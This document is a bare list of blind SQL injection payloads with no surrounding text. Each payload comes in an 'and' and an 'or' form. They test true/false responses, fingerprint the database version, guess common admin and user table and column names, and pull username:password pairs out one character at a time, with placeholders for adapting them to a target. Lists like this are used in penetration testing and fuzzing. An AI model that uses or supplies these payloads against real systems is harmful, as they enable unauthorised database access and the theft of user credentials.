' and 1=1--+
' and 1=2--+
' and 5050=5050--+
' and 5050=5051--+
' and substring(@@version,1,1)=4--+
' and substring(@@version,1,1)=5--+
' and ORD(MID((VERSION()), N, 1)) Insert<>=Comparer<InsertCharValueHere>--+
' and (SELECT 1 from admin limit 0,1)=1--+
' and (SELECT 1 from tblAdmin limit 0,1)=1--+
' and (SELECT 1 from Administrator limit 0,1)=1--+
' and (SELECT 1 from tbl_admin limit 0,1)=1--+
' and (SELECT 1 from user limit 0,1)=1--+
' and (SELECT 1 from users limit 0,1)=1--+
' and (SELECT 1 from TableName limit 0,1)=1--+
' and (SELECT substring(concat(1,ID),1,1) from admin limit 0,1)=1--+
' and (SELECT substring(concat(1,name),1,1) from tblAdmin limit 0,1)=1--+
' and (SELECT substring(concat(1,login),1,1) from Administrator limit 0,1)=1--+
' and (SELECT substring(concat(1,password),1,1) from user limit 0,1)=1--+
' and (SELECT substring(concat(1,email),1,1) from users limit 0,1)=1--+
' and (SELECT substring(concat(1,<insert-column-guess-here>),1,1) from <table-name> limit 0,1)=1--+
' and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>65--+
' and ascii(substring((SELECT concat(ColumnName1,0x3a,ColumnName2) from <table-Name> where <ColumnCondition=Value>),N,1))Insert<>=Comparer<InsertCharValueHere>--+
' or 1=1--+
' or 1=2--+
' or 5050=5050--+
' or 5050=5051--+
' or substring(@@version,1,1)=4--+
' or substring(@@version,1,1)=5--+
' or ORD(MID((VERSION()), N, 1)) Insert<>=Comparer<InsertCharValueHere>--+
' or (SELECT 1 from admin limit 0,1)=1--+
' or (SELECT 1 from tblAdmin limit 0,1)=1--+
' or (SELECT 1 from Administrator limit 0,1)=1--+
' or (SELECT 1 from tbl_admin limit 0,1)=1--+
' or (SELECT 1 from user limit 0,1)=1--+
' or (SELECT 1 from users limit 0,1)=1--+
' or (SELECT 1 from TableName limit 0,1)=1--+
' or (SELECT substring(concat(1,ID),1,1) from admin limit 0,1)=1--+
' or (SELECT substring(concat(1,name),1,1) from tblAdmin limit 0,1)=1--+
' or (SELECT substring(concat(1,login),1,1) from Administrator limit 0,1)=1--+
' or (SELECT substring(concat(1,password),1,1) from user limit 0,1)=1--+
' or (SELECT substring(concat(1,email),1,1) from users limit 0,1)=1--+
' or (SELECT substring(concat(1,<insert-column-guess-here>),1,1) from <table-name> limit 0,1)=1--+
' or ascii(substring((SELECT concat(username,0x3a,password) from users where userid=1),1,1))>65--+
' or ascii(substring((SELECT concat(ColumnName1,0x3a,ColumnName2) from <table-Name> where <ColumnCondition=Value>),N,1))Insert<>=Comparer<InsertCharValueHere>--+